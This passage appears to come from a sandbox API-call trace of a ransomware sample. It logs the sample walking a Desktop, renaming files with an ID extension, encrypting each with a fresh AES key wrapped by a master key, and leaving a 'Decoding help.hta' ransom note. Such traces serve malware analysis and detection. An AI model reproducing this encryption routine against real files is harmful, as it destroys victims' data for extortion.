dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0043.687] CreateFileMappingA (hFile=0x31c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x318 [0043.687] CryptAcquireContextA (in: phProv=0x51cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x51cfcec*=0x34490b0) returned 1 [0043.688] CryptGenKey (in: hProv=0x34490b0, Algid=0x6610, dwFlags=0x1, phKey=0x51cfce8 | out: phKey=0x51cfce8*=0x5a52f0) returned 1 [0043.688] CryptExportKey (in: hKey=0x5a52f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x51cfbe4, pdwDataLen=0x51cfce4 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfce4*=0x2c) returned 1 [0043.688] MapViewOfFile (hFileMappingObject=0x318, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14640) returned 0x4910000 [0043.690] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x100) returned 1 [0043.690] CryptEncrypt (in: hKey=0x5a52f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4910000, pdwDataLen=0x51cfce4*=0x14640, dwBufLen=0x14640 | out: pbData=0x4910000*, pdwDataLen=0x51cfce4*=0x14640) returned 1 [0043.691] UnmapViewOfFile (lpBaseAddress=0x4910000) returned 1 [0043.693] CloseHandle (hObject=0x318) returned 1 [0043.693] CryptDestroyKey (hKey=0x5a52f0) returned 1 [0043.693] CryptReleaseContext (hProv=0x34490b0, dwFlags=0x0) returned 1 [0043.693] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.693] WriteFile (in: hFile=0x31c, lpBuffer=0x51cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x51cfbe4*, lpNumberOfBytesWritten=0x51cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.694] WriteFile (in: hFile=0x31c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x51cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.694] CloseHandle (hObject=0x31c) returned 1 [0043.696] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Frdn5-oMFGap_Wjgfuj2.ods.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.696] FindNextFileW (in: hFindFile=0x5a58f0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bff48c0, ftCreationTime.dwHighDateTime=0x1d4d088, ftLastAccessTime.dwLowDateTime=0x980e30b0, ftLastAccessTime.dwHighDateTime=0x1d4c915, ftLastWriteTime.dwLowDateTime=0x980e30b0, ftLastWriteTime.dwHighDateTime=0x1d4c915, nFileSizeHigh=0x0, nFileSizeLow=0xa382, dwReserved0=0x0, dwReserved1=0x0, cFileName="fyqw5W.mp3", cAlternateFileName="")) returned 1 [0043.696] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0043.696] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0043.696] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" [0043.696] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decoding help.hta")) returned 0x1 [0043.696] lstrcmpiW (lpString1="Decoding help.hta", lpString2="fyqw5W.mp3") returned -1 [0043.696] lstrlenW (lpString="fyqw5W.mp3") returned 10 [0043.696] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0043.696] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0043.696] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="fyqw5W.mp3" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fyqw5W.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fyqw5W.mp3" [0043.696] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fyqw5W.mp3" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fyqw5W.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fyqw5W.mp3" [0043.696] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fyqw5W.mp3", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fyqw5W.mp3.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fyqw5W.mp3.[ID]g9uZrLhJaygpwRm1[ID]" [0043.696] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fyqw5W.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fyqw5w.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fyqw5W.mp3.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fyqw5w.mp3.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fyqw5W.mp3.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fyqw5w.mp3.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0043.697] CreateFileMappingA (hFile=0x31c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x318 [0043.697] CryptAcquireContextA (in: phProv=0x51cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x51cfcec*=0x34490b0) returned 1 [0043.698] CryptGenKey (in: hProv=0x34490b0, Algid=0x6610, dwFlags=0x1, phKey=0x51cfce8 | out: phKey=0x51cfce8*=0x5a5830) returned 1 [0043.698] CryptExportKey (in: hKey=0x5a5830, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x51cfbe4, pdwDataLen=0x51cfce4 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfce4*=0x2c) returned 1 [0043.698] MapViewOfFile (hFileMappingObject=0x318, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa380) returned 0x4410000 [0043.700] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x100) returned 1 [0043.700] CryptEncrypt (in: hKey=0x5a5830, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4410000, pdwDataLen=0x51cfce4*=0xa380, dwBufLen=0xa380 | out: pbData=0x4410000*, pdwDataLen=0x51cfce4*=0xa380) returned 1 [0043.701] UnmapViewOfFile (lpBaseAddress=0x4410000) returned 1 [0043.981] CloseHandle (hObject=0x318) returned 1 [0043.981] CryptDestroyKey (hKey=0x5a5830) returned 1 [0043.981] CryptReleaseContext (hProv=0x34490b0, dwFlags=0x0) returned 1 [0043.981] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.981] WriteFile (in: hFile=0x31c, lpBuffer=0x51cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x51cfbe4*, lpNumberOfBytesWritten=0x51cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.982] WriteFile (in: hFile=0x31c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x51cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.982] CloseHandle (hObject=0x31c) returned 1 [0043.984] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fyqw5W.mp3.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.984] FindNextFileW (in: hFindFile=0x5a58f0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd10239a0, ftCreationTime.dwHighDateTime=0x1d4ccc3, ftLastAccessTime.dwLowDateTime=0xd77b78d0, ftLastAccessTime.dwHighDateTime=0x1d4d481, ftLastWriteTime.dwLowDateTime=0xd77b78d0, ftLastWriteTime.dwHighDateTime=0x1d4d481, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G_s-w2bcxqR", cAlternateFileName="G_S-W2~1")) returned 1 [0043.984] lstrcmpW (lpString1=".", lpString2="G_s-w2bcxqR") returned -1 [0043.984] lstrcmpW (lpString1="..", lpString2="G_s-w2bcxqR") returned -1 [0043.984] lstrcmpiW (lpString1="windows", lpString2="G_s-w2bcxqR") returned 1 [0046.073] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0046.073] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0046.073] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="G_s-w2bcxqR" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR" [0046.073] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\*.*" [0046.073] GlobalMemoryStatus (in: lpBuffer=0x51cfd10 | out: lpBuffer=0x51cfd10) [0046.073] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10790048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x46c [0046.130] CloseHandle (hObject=0x46c) returned 1 [0046.130] FindNextFileW (in: hFindFile=0x5a58f0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddd38170, ftCreationTime.dwHighDateTime=0x1d4c9d5, ftLastAccessTime.dwLowDateTime=0x5a16f840, ftLastAccessTime.dwHighDateTime=0x1d4cf38, ftLastWriteTime.dwLowDateTime=0x5a16f840, ftLastWriteTime.dwHighDateTime=0x1d4cf38, nFileSizeHigh=0x0, nFileSizeLow=0x12feb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hg1aq.jpg", cAlternateFileName="")) returned 1 [0046.130] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0046.130] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0046.130] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" [0046.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decoding help.hta")) returned 0x1 [0046.130] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Hg1aq.jpg") returned -1 [0046.130] lstrlenW (lpString="Hg1aq.jpg") returned 9 [0046.130] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0046.130] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0046.130] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Hg1aq.jpg" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hg1aq.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hg1aq.jpg" [0046.130] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hg1aq.jpg" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hg1aq.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hg1aq.jpg" [0046.130] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hg1aq.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hg1aq.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hg1aq.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0046.131] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hg1aq.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hg1aq.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hg1aq.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hg1aq.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hg1aq.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hg1aq.jpg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0046.132] CreateFileMappingA (hFile=0x46c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3c0 [0046.132] CryptAcquireContextA (in: phProv=0x51cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x51cfcec*=0x34491c0) returned 1 [0046.133] CryptGenKey (in: hProv=0x34491c0, Algid=0x6610, dwFlags=0x1, phKey=0x51cfce8 | out: phKey=0x51cfce8*=0x671cb0) returned 1 [0046.133] CryptExportKey (in: hKey=0x671cb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x51cfbe4, pdwDataLen=0x51cfce4 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfce4*=0x2c) returned 1 [0046.133] MapViewOfFile (hFileMappingObject=0x3c0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12fe0) returned 0x3240000 [0046.134] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x100) returned 1 [0046.135] CryptEncrypt (in: hKey=0x671cb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3240000, pdwDataLen=0x51cfce4*=0x12fe0, dwBufLen=0x12fe0 | out: pbData=0x3240000*, pdwDataLen=0x51cfce4*=0x12fe0) returned 1 [0046.136] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0046.138] CloseHandle (hObject=0x3c0) returned 1 [0046.138] CryptDestroyKey (hKey=0x671cb0) returned 1 [0046.138] CryptReleaseContext (hProv=0x34491c0, dwFlags=0x0) returned 1 [0046.138] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.138] WriteFile (in: hFile=0x46c, lpBuffer=0x51cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x51cfbe4*, lpNumberOfBytesWritten=0x51cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.138] WriteFile (in: hFile=0x46c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x51cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.139] CloseHandle (hObject=0x46c) returned 1 [0046.140] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hg1aq.jpg.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.140] FindNextFileW (in: hFindFile=0x5a58f0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36e7fd80, ftCreationTime.dwHighDateTime=0x1d4cbcb, ftLastAccessTime.dwLowDateTime=0xaa06ceb0, ftLastAccessTime.dwHighDateTime=0x1d4d187, ftLastWriteTime.dwLowDateTime=0xaa06ceb0, ftLastWriteTime.dwHighDateTime=0x1d4d187, nFileSizeHigh=0x0, nFileSizeLow=0x658, dwReserved0=0x0, dwReserved1=0x0, cFileName="hmhr.wav", cAlternateFileName="")) returned 1 [0046.140] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0046.140] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0046.140] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" [0046.140] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decoding help.hta")) returned 0x1 [0046.141] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hmhr.wav") returned -1 [0046.141] lstrlenW (lpString="hmhr.wav") returned 8 [0046.141] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0046.141] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0046.141] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="hmhr.wav" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hmhr.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hmhr.wav" [0046.141] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hmhr.wav" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hmhr.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hmhr.wav" [0046.141] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hmhr.wav", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hmhr.wav.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hmhr.wav.[ID]g9uZrLhJaygpwRm1[ID]" [0046.141] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hmhr.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hmhr.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hmhr.wav.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hmhr.wav.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hmhr.wav.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hmhr.wav.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0046.142] CreateFileMappingA (hFile=0x46c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3c0 [0046.142] CryptAcquireContextA (in: phProv=0x51cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x51cfcec*=0x34491c0) returned 1 [0046.143] CryptGenKey (in: hProv=0x34491c0, Algid=0x6610, dwFlags=0x1, phKey=0x51cfce8 | out: phKey=0x51cfce8*=0x671c70) returned 1 [0046.143] CryptExportKey (in: hKey=0x671c70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x51cfbe4, pdwDataLen=0x51cfce4 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfce4*=0x2c) returned 1 [0046.143] MapViewOfFile (hFileMappingObject=0x3c0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x640) returned 0x2fe0000 [0046.144] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x51cfbe4*, pdwDataLen=0x51cfcf8*=0x100) returned 1 [0046.144] CryptEncrypt (in: hKey=0x671c70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fe0000*, pdwDataLen=0x51cfce4*=0x640, dwBufLen=0x640 | out: pbData=0x2fe0000*, pdwDataLen=0x51cfce4*=0x640) returned 1 [0046.145] UnmapViewOfFile (lpBaseAddress=0x2fe0000) returned 1 [0046.146] CloseHandle (hObject=0x3c0) returned 1 [0046.146] CryptDestroyKey (hKey=0x671c70) returned 1 [0046.146] CryptReleaseContext (hProv=0x34491c0, dwFlags=0x0) returned 1 [0046.146] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.146] WriteFile (in: hFile=0x46c, lpBuffer=0x51cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x51cfbe4*, lpNumberOfBytesWritten=0x51cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.147] WriteFile (in: hFile=0x46c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x51cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.147] CloseHandle (hObject=0x46c) returned 1 [0046.148] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hmhr.wav.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.148] FindNextFileW (in: hFindFile=0x5a58f0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60b96450, ftCreationTime.dwHighDateTime=0x1d4c621, ftLastAccessTime.dwLowDateTime=0xb1fbb590, ftLastAccessTime.dwHighDateTime=0x1d4cd09, ftLastWriteTime.dwLowDateTime=0xb1fbb590, ftLastWriteTime.dwHighDateTime=0x1d4cd09, nFileSizeHigh=0x0, nFileSizeLow=0x13b7f, dwReserved0=0x0, dwReserved1=0x0, cFileName="hTefMhnvMK.flv", cAlternateFileName="HTEFMH~1.FLV")) returned 1 [0046.148] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0046.148] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned 45 [0046.148] lstrcatW 